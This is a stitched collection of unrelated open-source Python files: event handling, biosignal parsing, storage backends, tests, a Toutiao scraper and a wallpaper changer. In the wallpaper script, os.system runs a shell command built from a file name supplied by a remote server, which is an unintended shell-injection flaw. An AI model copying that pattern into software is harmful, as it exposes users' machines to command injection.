def subscribe(
self, event_type: t.Type[Event], *callbacks: t.Callable[[t.Any], t.Any]
) -> None:
"""Subscribe callbacks to an event.
## Arguments
* `event_type` -
The event type to subscribe the callback to. This **must**
be a subclass of `Event`.
* `*callbacks` -
A series of callbacks to subscribe to the event.
## Raises
`NoEventQueue` -
The event queue has not been created.
"""
for cb in callbacks:
self.callbacks[event_type].append(cb)
log.info(
f"Subscribed to {event_type.__name__} events "
f"with callback '{cb.__name__}'"
)
def listen(self, event_type: type[Event]) -> ListenerT:
"""A decorator used to subscribe the wrapped callback to an
event.
## Arguments
* `event_type` -
The event type to subscribe to. This **must** be a subclass
of `events.Event`.
## Example
```py
@bot.events.listen(events.StreamFetchedEvent)
async def on_stream_fetched(event):
print(f"Fetched stream with ID: {event.stream.id}")
```
"""
return lambda callback: self.subscribe(event_type, callback)
|
py | b4002baed302a739b9b7c52c3d85668127eceba2 | """Class to import HRV RRI data in text format.
"""
from logging import getLogger
from numpy import arange, cumsum, empty, float64, interp, newaxis
from scipy.interpolate import splev, splrep
from datetime import datetime, timedelta
from .utils import DEFAULT_DATETIME
lg = getLogger(__name__)
class LyonRRI:
"""Class to read text format RR interval data from HRVanalysis export
(INSERM/Lyon). Returns one channel only.
Parameters
----------
rec_dir : path to record directory
the folder containing the record
Notes
-----
With code adapted from Rhenan Bartels: https://github.com/rhenanbartels/hrv
"""
def __init__(self, rec_dir):
lg.info('Reading ' + str(rec_dir))
self.filename = rec_dir
self.s_freq = None
self.hdr = self.return_hdr()
self.dig_min = 0
self.dig_max = 3000
self.phys_min = 0
self.phys_max = 3000
self.rri = self.return_rri(0, self.hdr[4])
self.time = self.create_time(self.rri)
self.time_interp = None
self.rri_interp = None
def return_hdr(self):
"""Return the header for further use.
Returns
-------
subj_id : str
subject identification code
start_time : datetime
start time of the dataset
s_freq : float
sampling frequency
chan_name : list of str
list of all the channels
n_samples : int
number of samples in the dataset
orig : dict
the full header
"""
hdr = {}
hdr['s_freq'] = self.s_freq
hdr['chan_name'] = ['RRi']
with open(self.filename, 'rt') as f:
head = [next(f) for x in range(12)]
hdr['subj_id'] = head[0][11:-3]
hdr['start_time'] = DEFAULT_DATETIME
hdr['recorder'] = head[2][10:]
hdr['s_freq_ecg'] = int(head[3][4:]) # ECG sampling frequency
t = datetime.strptime(head[4][16:24], '%H:%M:%S')
hdr['total_dur'] = timedelta(hours=t.hour, minutes=t.minute,
seconds=t.second)
hdr['export_date'] = DEFAULT_DATETIME
hdr['data_type'] = head[10][11:]
for i, _ in enumerate(f):
pass
hdr['n_samples'] = i
output = (hdr['subj_id'], hdr['start_time'], hdr['s_freq'],
hdr['chan_name'], hdr['n_samples'], hdr)
return output
def return_dat(self, chan, begsam, endsam):
if self.rri_interp is None:
raise ValueError('RRi has not been interpolated.')
return self.rri_interp[newaxis, begsam:endsam]
def return_markers(self):
"""There are no markers in this format.
"""
return []
def create_time(self, rri):
time = (cumsum(rri) / 1000.0)
return time - time[0]
def return_rri(self, begsam, endsam):
"""Return raw, irregularly-timed RRI."""
interval = endsam - begsam
dat = empty(interval)
k = 0
with open(self.filename, 'rt') as f:
[next(f) for x in range(12)]
for j, datum in enumerate(f):
if begsam <= j < endsam:
dat[k] = float64(datum[:datum.index('\t')])
k += 1
if k == interval:
break
return dat
def interpolate(self, s_freq=4, interp_method='cubic'):
rri = self.rri
irregular_time = self.time
step = 1 / float(s_freq)
regular_time = arange(0, irregular_time[-1] + step, step)
if interp_method == 'cubic':
tck = splrep(irregular_time, rri, s=0)
rri_interp = splev(regular_time, tck, der=0)
elif interp_method == 'linear':
rri_interp = interp(regular_time, irregular_time, rri)
self.time_interp = regular_time
self.rri_interp = rri_interp
self.s_freq = s_freq
|
py | b4002d3e1777721a90b488391eb7649eb90ca45f |
class Box:
pass
|
py | b4002de7eff9d788b1bab41ebae70a00cedae7d6 | """
Write an algorithm to determine if a number is "happy".
A happy number is a number defined by the following process: Starting with any positive integer, replace the number by
the sum of the squares of its digits, and repeat the process until the number equals 1 (where it will stay), or it
loops endlessly in a cycle which does not include 1. Those numbers for which this process ends in 1 are happy numbers.
Example: 19 is a happy number
1^2 + 9^2 = 82
8^2 + 2^2 = 68
6^2 + 8^2 = 100
1^2 + 0^2 + 0^2 = 1
"""
__author__ = 'Daniel'
class Solution:
def isHappy(self, n):
"""
Start with several simple cases and find the pattern.
:param n:
:rtype: bool
"""
nxt = 0
appeared = set()
while True:
nxt += (n%10)*(n%10)
n /= 10
if n == 0:
if nxt == 1:
return True
if nxt in appeared:
return False
appeared.add(nxt)
n = nxt
nxt = 0
|
py | b4002eb31a1fb9881894990bfa58323c0a57b6f5 | from __future__ import annotations
from api.data_structures import Stack
from api.operation import Operation
class HistoryManager:
def __init__(self):
self.undo_stack: Stack[Operation] = Stack()
self.redo_stack: Stack[Operation] = Stack()
def add_operation(self, operation_instance: Operation):
self.undo_stack.append(operation_instance)
def undo(self) -> Operation:
operation_to_undo = self.undo_stack.pop()
self.redo_stack.append(operation_to_undo)
return operation_to_undo
def redo(self) -> Operation:
operation_to_redo = self.redo_stack.pop()
self.undo_stack.append(operation_to_redo)
return operation_to_redo
def __contains__(self, item):
if isinstance(item, Operation):
return item in self.undo_stack
|
py | b4002f0053fad4992bcf84b4a942ed7e3d075f04 | from contextlib import contextmanager
import sqlalchemy as db
from dagster import check
from dagster.core.serdes import ConfigurableClass, ConfigurableClassData
from dagster.core.storage.runs import RunStorageSqlMetadata, SqlRunStorage
from dagster.core.storage.sql import create_engine, get_alembic_config, run_alembic_upgrade
from ..utils import pg_config, pg_url_from_config
class PostgresRunStorage(SqlRunStorage, ConfigurableClass):
def __init__(self, postgres_url, inst_data=None):
self.postgres_url = postgres_url
with self.get_engine() as engine:
RunStorageSqlMetadata.create_all(engine)
self._inst_data = check.opt_inst_param(inst_data, 'inst_data', ConfigurableClassData)
@contextmanager
def get_engine(self):
engine = create_engine(
self.postgres_url, isolation_level='AUTOCOMMIT', poolclass=db.pool.NullPool
)
try:
yield engine
finally:
engine.dispose()
@property
def inst_data(self):
return self._inst_data
@classmethod
def config_type(cls):
return pg_config()
@staticmethod
def from_config_value(inst_data, config_value):
return PostgresRunStorage(
inst_data=inst_data, postgres_url=pg_url_from_config(config_value)
)
@staticmethod
def create_clean_storage(postgres_url):
engine = create_engine(
postgres_url, isolation_level='AUTOCOMMIT', poolclass=db.pool.NullPool
)
try:
RunStorageSqlMetadata.drop_all(engine)
finally:
engine.dispose()
return PostgresRunStorage(postgres_url)
@contextmanager
def connect(self, _run_id=None): # pylint: disable=arguments-differ
with self.get_engine() as engine:
yield engine
def upgrade(self):
alembic_config = get_alembic_config(__file__)
with self.get_engine() as engine:
run_alembic_upgrade(alembic_config, engine)
|
py | b4002fbe0ad372fe23402930dfe09fce27b1248a | import os
from tempfile import TemporaryDirectory
from typing import cast
import pystac
from pystac.utils import is_absolute_href, make_absolute_href
from stactools.cli.commands.copy import create_copy_command, create_move_assets_command
from stactools.testing import CliTestCase
from .test_cases import TestCases
class CopyTest(CliTestCase):
def create_subcommand_functions(self):
return [create_copy_command, create_move_assets_command]
def test_copy(self):
cat = TestCases.planet_disaster()
item_ids = set([i.id for i in cat.get_all_items()])
with TemporaryDirectory() as tmp_dir:
self.run_command(['copy', cat.get_self_href(), tmp_dir])
copy_cat = pystac.read_file(
os.path.join(tmp_dir, 'collection.json'))
copy_cat_ids = set([i.id for i in copy_cat.get_all_items()])
self.assertEqual(copy_cat_ids, item_ids)
def test_copy_to_relative(self):
cat = TestCases.planet_disaster()
with TemporaryDirectory() as tmp_dir:
cat.make_all_asset_hrefs_absolute()
cat.normalize_hrefs(tmp_dir)
cat.save(catalog_type=pystac.CatalogType.ABSOLUTE_PUBLISHED)
cat2_dir = os.path.join(tmp_dir, 'second')
command = [
'copy', '-t', 'SELF_CONTAINED', '-a',
cat.get_self_href(), cat2_dir
]
self.run_command(command)
cat2 = pystac.read_file(os.path.join(cat2_dir, 'collection.json'))
for item in cat2.get_all_items():
item_href = item.get_self_href()
for asset in item.assets.values():
href = asset.href
self.assertFalse(is_absolute_href(href))
common_path = os.path.commonpath([
os.path.dirname(item_href),
make_absolute_href(href, item_href)
])
self.assertTrue(common_path, os.path.dirname(item_href))
def test_copy_using_publish_location(self):
cat = TestCases.planet_disaster()
href = "http://test.com"
with TemporaryDirectory() as tmp_dir:
cat.make_all_asset_hrefs_absolute()
cat.normalize_hrefs(tmp_dir)
cat.save(catalog_type=pystac.CatalogType.ABSOLUTE_PUBLISHED)
cat2_dir = os.path.join(tmp_dir, 'second')
command = [
'copy', '-t', 'ABSOLUTE_PUBLISHED', '-a',
cat.get_self_href(), cat2_dir, '-l', href
]
self.run_command(command)
cat2 = pystac.read_file(os.path.join(cat2_dir, 'collection.json'))
for link in cat2.get_child_links():
self.assertTrue(cast(str, link.target).startswith(href))
def test_move_assets(self):
cat = TestCases.planet_disaster()
with TemporaryDirectory() as tmp_dir:
cat.normalize_hrefs(tmp_dir)
cat.save(catalog_type=pystac.CatalogType.RELATIVE_PUBLISHED)
cat_href = cat.get_self_href()
command = ['move-assets', '-c', cat_href]
self.assertEqual(self.run_command(command).exit_code, 0)
cat2 = pystac.read_file(cat_href)
for item in cat2.get_all_items():
item_href = item.get_self_href()
for asset in item.assets.values():
href = asset.href
self.assertFalse(is_absolute_href(href))
common_path = os.path.commonpath([
os.path.dirname(item_href),
make_absolute_href(href, item_href)
])
self.assertEqual(common_path, os.path.dirname(item_href))
|
py | b40030173515912732fafb79760b045cf808d0aa | import math
volume = [10.865, 1.936, 2.376, 2.652, 2.64, 1.2]
x_p = [8.9130435, 6.9130435, -1.686957, 3.1130435, -5.286957, -2.086957]
y_p = [1.20652174, -1.39347826, 1.20652174, 0.60652174, -0.29347826, -1.49347826]
z_p = [0.61669004, 0.21669004, -0.28330996, -0.18330996, 0.41669004, 0.21669004]
x_len = [1.5, 2.2, 2.4, 1.7, 2.4, 2.4]
y_len = [0.9, 0.8, 1.1, 1.3, 1.2, 1]
z_len = [0.3, 1.1, 0.9, 1.2, 1, 0.5]
def cal_centroid(flag, v, angle):
"""
:param flag: 第几个油箱
:param v: 当前油箱中油的容积
:param angle: 飞行器当前角度
:return: (x, y, z)质心位置
"""
x0 = x_len[flag]
y0 = y_len[flag]
z0 = z_len[flag]
v0 = volume[flag]
TAN = math.fabs(math.tan(angle))
if angle == 0:
return x_p[flag] / 2, y_p[flag] / 2, (v * z0) / (2 * v0) + z_p[flag] / 2 - z0 / 2
elif angle > 0:
if TAN < z0 / x0:
if v < y0 * x0 ** 2 * TAN / 2:
return math.sqrt((2 * v) / (9 * y0 * TAN)) + x_p[flag] / 2 - x0 / 2, y_p[flag] / 2, math.sqrt(
(2 * v * TAN) / (9 * y0)) + z_p[flag] / 2 - z0 / 2
elif (y0 * x0 ** 2 * TAN) / 2 < v < v0 - (y0 * x0 ** 2 * TAN) / 2:
return x0 ** 3 * TAN * y0 / (12 * v) + x_p[flag] / 2, y_p[flag] / 2, v / (2 * x0 * y0) + (
y0 * x0 ** 3 * TAN ** 2) / (24 * v) + z_p[flag] / 2 - z0 / 2
else:
return x0 / 2 + math.sqrt(2 * (v0 - v) ** 3 / (9 * v ** 2)) - x0 * y0 / (2 * v) + x_p[flag] / 2, y_p[
flag] / 2, z0 / 2 - v0 * z0 / (2 * v) + TAN * math.sqrt((v0 - v) ** 3 / (9 * v ** 2)) + z_p[
flag] / 2
else:
if v < y0 * x0 ** 2 / (2 * TAN):
return math.sqrt((2 * v) / (y0 * TAN * 9)) + x_p[flag] / 2 - x0 / 2, y_p[flag] / 2, math.sqrt(
(2 * v * TAN) / (y0 * 9)) + z_p[flag] / 2 - z0 / 2
elif y0 * x0 ** 2 / (2 * TAN) < v < v0 - (y0 * z0 ** 2) / (2 * TAN):
return v / (2 * z0 * y0) + (y0 * z0 ** 3) / (24 * TAN ** 2) + x_p[flag] / 2 - x0 / 2, y_p[flag] / 2, (
z0 ** 3 * y0) / (12 * v * TAN) + z_p[flag] / 2
else:
return x0 / 2 - (v0 * x0) / (2 * v) + TAN * math.sqrt((v0 - v) ** 3) / (3 * v) + x_p[flag] / 2, y_p[
flag] / 2, z0 / 2 + math.sqrt((v0 - v) ** 3) / (3 * v) + z_p[flag] / 2
else:
angle = -angle
if TAN < z0 / x0:
if v < y0 * x0 ** 2 * TAN / 2:
return x0 / 2 - 1 * math.sqrt((2 * v) / (9 * y0 * TAN)) + x_p[flag] / 2, y_p[flag] / 2, math.sqrt(
(2 * v * TAN) / (9 * y0)) + z_p[flag] / 2 - z0 / 2
elif (y0 * x0 ** 2 * TAN) / 2 < v < v0 - (y0 * x0 ** 2 * TAN) / 2:
return -1 * x0 + x0 ** 3 * TAN * y0 / (12 * v) + x_p[flag] / 2, y_p[flag] / 2, v / (2 * x0 * y0) + (
y0 * x0 ** 3 * TAN ** 2) / (24 * v) + z_p[flag] / 2 - v0 / 2
else:
return -1 * math.sqrt(2 * (v0 - v) ** 3 / (9 * v ** 2)) + x0 * y0 / (2 * v) + x_p[flag] / 2 - x0 / 2, \
y_p[flag] / 2, z0 / 2 - v0 * z0 / (2 * v) + TAN * math.sqrt((v0 - v) ** 3 / (9 * v ** 2)) + z_p[
flag] / 2
else:
if v < y0 * x0 ** 2 / (2 * TAN):
return x0 / 2 - math.sqrt((2 * v) / (y0 * TAN * 9)) + x_p[flag] / 2, y_p[flag] / 2, math.sqrt(
(2 * v * TAN) / (y0 * 9)) + z_p[flag] / 2 - z0 / 2
elif y0 * x0 ** 2 / (2 * TAN) < v < v0 - (y0 * z0 ** 2) / (2 * TAN):
return x0 / 2 - v / (2 * z0 * y0) - (y0 * z0 ** 3) / (24 * TAN ** 2) + x_p[flag] / 2, y_p[flag] / 2, - (
z0 ** 3 * y0) / (12 * v * TAN) + z_p[flag] / 2
else:
return (v0 * x0) / (2 * v) - TAN * math.sqrt((v0 - v) ** 3) / (3 * v) + x_p[flag] / 2 - x0 / 2, y_p[
flag] / 2, z0 / 2 + math.sqrt((v0 - v) ** 3) / (3 * v) + z_p[flag] / 2
if __name__ == '__main__':
print(cal_centroid(0, 0.3, 0.00046845))
|
py | b400304fea5b0745d67b97243aea326b061b2c8f | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Test client utility functions."""
import hashlib
import io
import os
import platform
import unittest
from unittest import mock
from absl import app
from absl.testing import absltest
from grr_response_client import client_utils
from grr_response_client import client_utils_common
from grr_response_core.lib.rdfvalues import paths as rdf_paths
from grr_response_core.lib.util import filesystem
from grr_response_core.lib.util import temp
from grr.test_lib import test_lib
class IsExecutionAllowedTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.is_execution_allowed = client_utils_common.IsExecutionAllowed
def testAllowsOnlyConfiguredCommands(self):
with test_lib.ConfigOverrider({
"Client.allowed_commands": ["/usr/bin/foo"],
}):
self.assertTrue(self.is_execution_allowed("/usr/bin/foo", []))
self.assertFalse(self.is_execution_allowed("/usr/bin/bar", []))
def testAllowsOnlyConfiguredCommandsWithArgs(self):
with test_lib.ConfigOverrider({
"Client.allowed_commands": [
"/bin/foo --bar --baz",
"/bin/foo --quux",
],
}):
self.assertTrue(self.is_execution_allowed("/bin/foo", ["--bar", "--baz"]))
self.assertTrue(self.is_execution_allowed("/bin/foo", ["--quux"]))
self.assertFalse(self.is_execution_allowed("/bin/foo", ["--norf"]))
def testAllowsOnlyConfiguredCommandsWithSimpleQuotes(self):
with test_lib.ConfigOverrider({
"Client.allowed_commands": ["'foo bar' 'baz quux'"],
}):
self.assertTrue(self.is_execution_allowed("foo bar", ["baz quux"]))
self.assertFalse(self.is_execution_allowed("foo bar", ["baz", "quux"]))
self.assertFalse(self.is_execution_allowed("foo", ["bar", "baz quux"]))
self.assertFalse(self.is_execution_allowed("foo", ["bar", "baz", "quux"]))
def testAllowsOnlyConfiguredCommandsWithComplexQuotes(self):
with test_lib.ConfigOverrider({
"Client.allowed_commands": [
"'/foo bar/\"quux norf\"/thud' -x '1 3 3 7' -y \"42\"",
],
}):
command = "/foo bar/\"quux norf\"/thud"
args = ["-x", "1 3 3 7", "-y", "42"]
self.assertTrue(self.is_execution_allowed(command, args))
class ClientUtilsTest(test_lib.GRRBaseTest):
"""Test the client utils."""
@unittest.skipIf(platform.system() != "Windows", "Windows only test.")
def testWinSplitPathspec(self):
# pylint: disable=g-import-not-at-top
from grr_response_client import client_utils_windows
# pylint: enable=g-import-not-at-top
raw_pathspec, path = client_utils_windows.GetRawDevice("C:\\")
self.assertStartsWith(raw_pathspec.path, "\\\\?\\Volume{")
self.assertEqual("/", path)
def testExecutionAllowlist(self):
"""Test if unknown commands are filtered correctly."""
# ls is not allowed
if platform.system() == "Windows":
cmd = "dir", []
else:
cmd = "ls", ["."]
(stdout, stderr, status, _) = client_utils_common.Execute(*cmd)
self.assertEqual(status, -1)
self.assertEqual(stdout, b"")
self.assertEqual(stderr, b"Execution disallowed by allowlist.")
# "echo 1" is
if platform.system() == "Windows":
cmd = "cmd.exe", ["/C", "echo 1"]
else:
cmd = "/bin/echo", ["1"]
(stdout, stderr, status, _) = client_utils_common.Execute(*cmd)
self.assertEqual(status, 0)
self.assertEqual(stdout, "1{}".format(os.linesep).encode("utf-8"))
self.assertEqual(stderr, b"")
# but not "echo 11"
if platform.system() == "Windows":
cmd = "cmd.exe", ["/C", "echo 11"]
else:
cmd = "/bin/echo", ["11"]
(stdout, stderr, status, _) = client_utils_common.Execute(*cmd)
self.assertEqual(status, -1)
self.assertEqual(stdout, b"")
self.assertEqual(stderr, b"Execution disallowed by allowlist.")
def AppendTo(self, list_obj, element):
list_obj.append(element)
def testExecutionTimeLimit(self):
"""Test if the time limit works."""
_, _, _, time_used = client_utils_common.Execute("/bin/sleep", ["10"], 0.1)
# This should take just a bit longer than 0.1 seconds.
self.assertLess(time_used, 1.0)
@unittest.skipIf(platform.system() != "Darwin", "Skipping macOS only test.")
@mock.patch(
"grr_response_client.client_utils_osx"
".platform.mac_ver",
return_value=("10.8.1", ("", "", ""), "x86_64"))
class OSXVersionTests(test_lib.GRRBaseTest):
def testVersionAsIntArray(self, _):
from grr_response_client import client_utils_osx # pylint: disable=g-import-not-at-top
osversion = client_utils_osx.OSXVersion()
self.assertEqual(osversion.VersionAsMajorMinor(), [10, 8])
def testVersionString(self, _):
from grr_response_client import client_utils_osx # pylint: disable=g-import-not-at-top
osversion = client_utils_osx.OSXVersion()
self.assertEqual(osversion.VersionString(), "10.8.1")
class MultiHasherTest(absltest.TestCase):
@staticmethod
def _GetHash(hashfunc, data):
hasher = hashfunc()
hasher.update(data)
return hasher.digest()
def testHashBufferSingleInput(self):
hasher = client_utils_common.MultiHasher()
hasher.HashBuffer(b"foo")
hash_object = hasher.GetHashObject()
self.assertEqual(hash_object.num_bytes, len(b"foo")) # pylint: disable=g-generic-assert
self.assertEqual(hash_object.md5, self._GetHash(hashlib.md5, b"foo"))
self.assertEqual(hash_object.sha1, self._GetHash(hashlib.sha1, b"foo"))
self.assertEqual(hash_object.sha256, self._GetHash(hashlib.sha256, b"foo"))
def testHashBufferMultiInput(self):
hasher = client_utils_common.MultiHasher(["md5", "sha1"])
hasher.HashBuffer(b"foo")
hasher.HashBuffer(b"bar")
hash_object = hasher.GetHashObject()
self.assertEqual(hash_object.num_bytes, len(b"foobar")) # pylint: disable=g-generic-assert
self.assertEqual(hash_object.md5, self._GetHash(hashlib.md5, b"foobar"))
self.assertEqual(hash_object.sha1, self._GetHash(hashlib.sha1, b"foobar"))
self.assertFalse(hash_object.sha256)
def testHashFileWhole(self):
with temp.AutoTempFilePath() as tmp_path:
with io.open(tmp_path, "wb") as tmp_file:
tmp_file.write(b"foobar")
hasher = client_utils_common.MultiHasher(["md5", "sha1"])
hasher.HashFilePath(tmp_path, len(b"foobar"))
hash_object = hasher.GetHashObject()
self.assertEqual(hash_object.num_bytes, len(b"foobar")) # pylint: disable=g-generic-assert
self.assertEqual(hash_object.md5, self._GetHash(hashlib.md5, b"foobar"))
self.assertEqual(hash_object.sha1, self._GetHash(hashlib.sha1, b"foobar"))
self.assertFalse(hash_object.sha256)
def testHashFilePart(self):
with temp.AutoTempFilePath() as tmp_path:
with io.open(tmp_path, "wb") as tmp_file:
tmp_file.write(b"foobar")
hasher = client_utils_common.MultiHasher(["md5", "sha1"])
hasher.HashFilePath(tmp_path, len(b"foo"))
hash_object = hasher.GetHashObject()
self.assertEqual(hash_object.num_bytes, len(b"foo")) # pylint: disable=g-generic-assert
self.assertEqual(hash_object.md5, self._GetHash(hashlib.md5, b"foo"))
self.assertEqual(hash_object.sha1, self._GetHash(hashlib.sha1, b"foo"))
self.assertFalse(hash_object.sha256)
def testHashBufferProgress(self):
progress = mock.Mock()
hasher = client_utils_common.MultiHasher(progress=progress)
hasher.HashBuffer(os.urandom(108))
self.assertTrue(progress.called)
self.assertEqual(hasher.GetHashObject().num_bytes, 108)
def testStatResultFromStatEntry(self):
stat_obj = os.stat_result([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
fs_stat = filesystem.Stat("/foo", stat_obj)
pathspec = rdf_paths.PathSpec(path="/foo", pathtype="OS")
stat_entry = client_utils.StatEntryFromStat(
fs_stat, pathspec, ext_attrs=False)
self.assertEqual(stat_obj, client_utils.StatResultFromStatEntry(stat_entry))
class GetRawDeviceTest(absltest.TestCase):
def testGetRawDevice(self):
if platform.system() == "Windows":
path = "C:\\"
else:
path = "/"
result, _ = client_utils.GetRawDevice(path)
self.assertTrue(result.path)
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
py | b4003057190e20de7a07707524fba0c379b4bfe1 | #!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: toutiao_m.py
@time: 2018-02-28 14:14
"""
import hashlib
import math
import re
import time
import execjs
from tools.char import un_escape
def get_as_cp():
t = int(math.floor(time.time()))
e = hex(t).upper()[2:]
m = hashlib.md5()
m.update(str(t).encode(encoding='utf-8'))
i = m.hexdigest().upper()
if len(e) != 8:
AS = '479BB4B7254C150'
CP = '7E0AC8874BB0985'
return AS, CP
n = i[0:5]
a = i[-5:]
s = ''
r = ''
for o in range(5):
s += n[o] + e[o]
r += e[o + 3] + a[o]
AS = 'A1' + s + e[-3:]
CP = e[0:3] + r + 'E1'
return AS, CP
# fixme
def parse_toutiao_article_info():
pass
def parse_toutiao_js_body(html_body, url=''):
"""
解析js
:param html_body:
:param url:
:return:
"""
rule = r'<script>(var BASE_DATA = {.*?};)</script>'
js_list = re.compile(rule, re.S).findall(html_body)
if not js_list:
print('parse error url: %s' % url)
print(html_body)
return ''.join(js_list)
class ParseJsTt(object):
"""
解析头条动态数据
"""
def __init__(self, js_body):
self.js_body = js_body
self._add_js_item_id_fn()
self._add_js_title_fn()
self._add_js_abstract_fn()
self._add_js_content_fn()
self._add_js_pub_time()
self._add_js_tags_fn()
self.ctx = execjs.compile(self.js_body)
def _add_js_item_id_fn(self):
js_item_id_fn = """
function r_item_id() {
return BASE_DATA.articleInfo.itemId;
};
"""
self.js_body += js_item_id_fn
def _add_js_title_fn(self):
js_title_fn = """
function r_title() {
return BASE_DATA.articleInfo.title;
};
"""
self.js_body += js_title_fn
def _add_js_abstract_fn(self):
js_abstract_fn = """
function r_abstract() {
return BASE_DATA.shareInfo.abstract;
};
"""
self.js_body += js_abstract_fn
def _add_js_content_fn(self):
js_content_fn = """
function r_content() {
return BASE_DATA.articleInfo.content;
};
"""
self.js_body += js_content_fn
def _add_js_pub_time(self):
js_pub_time_fn = """
function r_pub_time() {
return BASE_DATA.articleInfo.subInfo.time;
};
"""
self.js_body += js_pub_time_fn
def _add_js_tags_fn(self):
js_tags_fn = """
function r_tags() {
return BASE_DATA.articleInfo.tagInfo.tags;
};
"""
self.js_body += js_tags_fn
def parse_js_item_id(self):
return self.ctx.call('r_item_id') or ''
def parse_js_title(self):
return self.ctx.call('r_title') or ''
def parse_js_abstract(self):
return self.ctx.call('r_abstract') or ''
def parse_js_content(self):
return un_escape(self.ctx.call('r_content')) or ''
def parse_js_pub_time(self):
return self.ctx.call('r_pub_time') or time.strftime('%Y-%m-%d %H:%M:%S')
def parse_js_tags(self):
return ','.join([tag['name'] or '' for tag in self.ctx.call('r_tags')])
if __name__ == '__main__':
print(get_as_cp())
|
py | b40031c141980800e8505da2173e67aeb6bfd83a | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Supported desktop environments
# - gnome (Unity, Gnome 3)
# - fluxbox (Fluxbox, Openbox, JWM, AfterStep)
try:
# Python 2
from urllib2 import urlopen
except ImportError:
# Python 3
from urllib.request import urlopen
try:
# Python 2
from urllib import quote_plus
except ImportError:
# Python 3
from urllib.parse import quote_plus
import os
import sys
import json
import random
import subprocess
# Default settings, create settings.ini file instead of editing this file
wallpaperGetUrls = ["http://www.mylittlewallpaper.com/c/all/api/v2/" +
"random.json?size=2&limit=1"]
desktopEnvironment = "gnome"
wallpaperSaveFolder = "wallpapers"
favouritesUsername = ""
favouritesToken = ""
# Change to current directory
dirName = os.path.dirname(os.path.realpath(__file__))
os.chdir(dirName)
if os.path.exists("settings.ini"):
try:
import ConfigParser as cParser
except ImportError:
import configparser as cParser
config = cParser.ConfigParser()
config.read("settings.ini")
if config.has_option("MyLittleWallpaperChanger", "wallpaperGetUrls"):
urlsString = config.get("MyLittleWallpaperChanger", "wallpaperGetUrls")
wallpaperGetUrls = urlsString.split(" ")
desktopEnvironment = config.get("MyLittleWallpaperChanger",
"desktopEnvironment")
wallpaperSaveFolder = config.get("MyLittleWallpaperChanger",
"wallpaperSaveFolder")
if config.has_option("MyLittleWallpaperChanger", "favouritesUsername"):
favouritesUsername = config.get("MyLittleWallpaperChanger",
"favouritesUsername")
if config.has_option("MyLittleWallpaperChanger", "favouritesToken"):
favouritesToken = config.get("MyLittleWallpaperChanger",
"favouritesToken")
if favouritesUsername and favouritesToken:
import hashlib
import uuid
requestId = uuid.uuid4().hex
urlHash = hashlib.sha256(str(favouritesUsername + favouritesToken +
requestId).encode('utf-8')).hexdigest()
wallpaperGetUrls = ["http://www.mylittlewallpaper.com/c/all/api/v2/" +
"favourites.json?limit=1&sort=random&requestId=" +
requestId + "&userName=" +
quote_plus(favouritesUsername) + "&hash=" + urlHash]
def getWallpaper():
if not os.path.exists(wallpaperSaveFolder):
os.makedirs(wallpaperSaveFolder)
random.shuffle(wallpaperGetUrls)
wallpaperGetUrl = wallpaperGetUrls[0]
# Fetch json from server
try:
jsonData = json.loads(urlopen(wallpaperGetUrl, timeout=60).read().
decode('utf-8'))
except Exception as e:
print(e)
return ""
# Check if json contains a wallpaper
for wallpaper in jsonData["result"]:
fullImageUrl = wallpaper["fullImageURL"]
imageName = os.path.basename(fullImageUrl)
if not os.path.exists(os.path.join(wallpaperSaveFolder, imageName)):
try:
imageData = urlopen(fullImageUrl, timeout=60).read()
if len(imageData) > 0:
fileHandler = open(os.path.join(wallpaperSaveFolder,
imageName), "wb")
fileHandler.write(imageData)
fileHandler.close()
else:
raise Exception("Empty file, exiting")
except Exception as e:
print(e)
return ""
return imageName
return ""
def changeWallpaper(wallpaperUri):
# Todo: Add support for other desktop environments
try:
if desktopEnvironment == "gnome":
os.system("gsettings set org.gnome.desktop.background " +
"picture-uri '%s'" % (wallpaperUri))
elif desktopEnvironment == "fluxbox":
try:
subprocess.Popen(["fbsetbg", wallpaperUri])
except:
sys.stderr.write("Failed to set desktop wallpaper. Please " +
"install fbsetbg.")
else:
sys.stderr.write("Failed to set desktop wallpaper. Unsupported " +
"desktop environment.")
return False
return True
except Exception as e:
print(e)
return False
wallpaperFilename = getWallpaper()
if wallpaperFilename:
filePath = os.path.abspath(os.path.join(wallpaperSaveFolder,
wallpaperFilename))
changeWallpaper("file://" + filePath)
|
py | b40032fde80056bfcd364dd1051f2b056827154b | """Convert Wavefront OBJ / MTL files into Three.js (JSON model version, to be used with web worker based ascii / binary loader)
-------------------------
How to use this converter
-------------------------
python convert_obj_three.py -i infile.obj -o outfile.js [-m "morphfiles*.obj"] [-c "morphcolors*.obj"] [-a center|centerxz|top|bottom|none] [-s smooth|flat] [-t ascii|binary] [-d invert|normal] [-b] [-e]
Notes:
- flags
-i infile.obj input OBJ file
-o outfile.js output JS file
-m "morphfiles*.obj" morph OBJ files (can use wildcards, enclosed in quotes multiple patterns separate by space)
-c "morphcolors*.obj" morph colors OBJ files (can use wildcards, enclosed in quotes multiple patterns separate by space)
-a center|centerxz|top|bottom|none model alignment
-s smooth|flat smooth = export vertex normals, flat = no normals (face normals computed in loader)
-t ascii|binary export ascii or binary format (ascii has more features, binary just supports vertices, faces, normals, uvs and materials)
-d invert|normal invert transparency
-b bake material colors into face colors
-e export edges
-x 10.0 scale and truncate
-f 2 morph frame sampling step
- by default:
use smooth shading (if there were vertex normals in the original model)
will be in ASCII format
original model is assumed to use non-inverted transparency / dissolve (0.0 fully transparent, 1.0 fully opaque)
no face colors baking
no edges export
no scale and truncate
morph frame step = 1 (all files will be processed)
- binary conversion will create two files:
outfile.js (materials)
outfile.bin (binary buffers)
--------------------------------------------------
How to use generated JS file in your HTML document
--------------------------------------------------
<script type="text/javascript" src="Three.js"></script>
...
<script type="text/javascript">
...
// load ascii model
var jsonLoader = new THREE.JSONLoader();
jsonLoader.load( { model: "Model_ascii.js", callback: function( geometry ) { createScene( geometry) } } );
// load binary model
var binLoader = new THREE.BinaryLoader();
binLoader.load( { model: "Model_bin.js", callback: function( geometry ) { createScene( geometry) } } );
function createScene( geometry ) {
var mesh = new THREE.Mesh( geometry, new THREE.MeshFaceMaterial() );
}
...
</script>
-------------------------------------
Parsers based on formats descriptions
-------------------------------------
http://en.wikipedia.org/wiki/Obj
http://en.wikipedia.org/wiki/Material_Template_Library
